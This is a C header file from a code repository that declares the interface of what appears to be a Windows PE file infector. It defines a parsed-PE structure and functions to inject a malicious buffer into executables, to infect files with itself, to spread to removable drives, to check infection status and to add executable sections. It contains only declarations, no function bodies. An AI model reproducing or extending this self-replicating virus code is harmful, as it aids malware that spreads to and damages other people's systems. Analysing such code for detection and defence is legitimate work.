aboutsummaryrefslogtreecommitdiff
path: root/include/pe_infect.h
blob: fecbfcc6875e7bf3a18a86e6c398e9b7f9c70484 (plain) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86

#ifndef PE_INFECT_H
#define PE_INFECT_H

#include "loader.h"


#define STRINGIFY(s) #s
#define MAKE_STR(s) STRINGIFY(s)

typedef struct ParsedPE
{
    BOOL valid;
    BYTE* ptrToBuf;
    SIZE_T bufSiz;
    PIMAGE_DOS_HEADER hdrDos;
    PIMAGE_FILE_HEADER hdrFile;
    PIMAGE_OPTIONAL_HEADER hdrOptional;
    PIMAGE_SECTION_HEADER hdrSection;
    PIMAGE_DATA_DIRECTORY dataDir;
    /* dll stuff */
    BOOL hasDLL;
    BYTE* ptrToDLL;
    SIZE_T sizOfDLL;
    /* loader stuff */
    BOOL hasLdr;
    BYTE* ptrToLdr;
    SIZE_T sizOfLdr;
    struct loader_x86_data* loader86;
} __attribute__((packed, gcc_struct)) ParsedPE;


void setOrigLoader(const struct loader_x86_data* ldr);

const struct loader_x86_data* getOrigLoader(void);

void setImageBase(DWORD newBase);

DWORD getImageBase(void);

void setImageSize(DWORD newSize);

DWORD getImageSize(void);

void setSectionAdr(DWORD newAdr);

DWORD getSectionAdr(void);

BYTE* getLoader(SIZE_T* pSiz);

SIZE_T getRealLoaderSize(void);

BYTE* PtrFromOffset(BYTE* base, DWORD offset);

DWORD RvaToOffset(const struct ParsedPE* ppPtr, DWORD dwRva);

BYTE* RvaToPtr(const struct ParsedPE* ppPtr, DWORD dwRva);

DWORD OffsetToRva(const struct ParsedPE* ppPtr, DWORD offset);

DWORD PtrToOffset(const struct ParsedPE* ppPtr, const BYTE* ptr);

DWORD PtrToRva(const struct ParsedPE* ppPtr, const BYTE* ptr);

BOOL bParsePE(BYTE* buf, const SIZE_T szBuf, struct ParsedPE* ppPtr, BOOL earlyStage);

BOOL bCheckEndMarker(const struct ParsedPE *ppPtr);

BOOL bAddSection(const char* sName, const BYTE* sectionContentBuf, SIZE_T szSection, BOOL executable, struct ParsedPE* ppPtr);

BOOL bInfectFileWith(const char* sFile, const BYTE* maliciousBuf, SIZE_T maliciousSiz);

BOOL bInfectWithMyself(const char* sFile);

BOOL bIsInfected(const struct ParsedPE* ppPtr);

void* pGetSegmentAdr(const char* sName, BOOL caseSensitive, const struct ParsedPE* ppPtr, SIZE_T* pSegSiz);

DWORD dwDoRebase(void* dllSectionAdr, SIZE_T dllSectionSiz, const void* dllBaseAdr);

DWORD dwInfectRemovables(void);

DWORD dwCountNonSystemImportLibs(const struct ParsedPE* ppPtr);

FARPROC WINAPI fnMyGetProcAddress(HMODULE hModule, LPCSTR szProcName);

#endif
Powered by cgit, Themed by Ted Yin.